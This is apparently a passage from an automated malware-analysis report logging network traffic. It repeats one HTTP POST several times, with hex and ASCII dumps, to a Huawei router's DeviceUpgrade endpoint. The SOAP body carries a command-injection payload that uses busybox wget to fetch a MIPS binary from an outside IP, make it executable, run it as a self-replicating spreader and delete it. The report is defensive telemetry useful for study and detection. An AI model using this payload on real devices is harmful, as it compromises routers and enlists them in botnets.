3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 37 32 2e 32 34 37 2e 33 38 2e 32 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 172.247.38.252 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |